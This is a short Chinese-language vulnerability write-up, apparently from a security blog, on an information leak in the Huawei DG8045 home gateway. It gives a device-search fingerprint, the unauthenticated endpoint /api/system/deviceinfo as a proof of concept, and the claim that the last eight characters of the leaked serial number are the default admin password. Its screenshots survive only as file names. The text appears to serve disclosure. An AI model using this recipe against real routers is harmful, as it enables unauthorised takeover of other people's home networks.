Huawei DG8045 deviceinfo 信息泄漏漏洞

漏洞描述

Huawei DG8045 deviceinfo api接口存在信息泄漏漏洞,攻击者通过泄漏的信息可以获得账号密码登录后台。

漏洞影响

Huawei DG8045

网络测绘

app=”DG8045-Home-Gateway-DG8045″

漏洞复现

登录页面

20240320003717289-png

验证POC

/api/system/deviceinfo

20240320003753685-png (1)

SerialNumber 后8位即为初始密码

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容